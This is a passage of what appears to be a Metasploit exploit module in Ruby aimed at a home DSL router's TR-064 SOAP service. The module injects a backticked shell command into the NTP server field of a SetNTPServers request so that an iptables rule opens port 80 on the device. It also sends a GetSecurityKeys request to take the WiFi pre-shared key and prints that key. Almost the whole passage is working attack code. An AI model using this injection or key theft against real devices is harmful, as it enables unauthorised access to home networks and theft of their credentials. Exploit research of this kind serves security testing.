@data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
@data_cmd_template << " <SOAP-ENV:Body>"
@data_cmd_template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
@data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>"
@data_cmd_template << " <NewNTPServer2></NewNTPServer2>"
@data_cmd_template << " <NewNTPServer3></NewNTPServer3>"
@data_cmd_template << " <NewNTPServer4></NewNTPServer4>"
@data_cmd_template << " <NewNTPServer5></NewNTPServer5>"
@data_cmd_template << " </u:SetNTPServers>"
@data_cmd_template << " </SOAP-ENV:Body>"
@data_cmd_template << "</SOAP-ENV:Envelope>"
end
def check
begin
res = send_request_cgi({
'uri' => '/globe'
})
rescue ::Rex::ConnectionError
vprint_error("A connection error has occured")
return Exploit::CheckCode::Unknown
end
if res and res.code == 404 and res.body =~ /home_wan.htm/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Trying to access the device...")
unless check == Exploit::CheckCode::Appears
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("Exploiting...")
print_status("Dropping firewall on port 80...")
execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
key = get_wifi_key()
print_status("WiFi key is #{key}")
execute_command("tick.eircom.net","")
end
def execute_command(cmd, opts)
uri = '/UD/act?1'
soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
data_cmd = @data_cmd_template % "#{cmd}"
begin
res = send_request_cgi({
'uri' => uri,
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => data_cmd
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def get_wifi_key()
print_status("Getting the wifi key...")
uri = '/UD/act?1'
soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
data_cmd_template = "<?xml version=\"1.0\"?>"
data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
data_cmd_template << " <SOAP-ENV:Body>"
data_cmd_template << " <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
data_cmd_template << " </u:GetSecurityKeys>"
data_cmd_template << " </SOAP-ENV:Body>"
data_cmd_template << "</SOAP-ENV:Envelope>"
data_cmd= data_cmd_template
begin
res = send_request_cgi({
'uri' => uri,
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => data_cmd
})
/NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body
return key
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
Reference in a new issue View git blame Copy permalink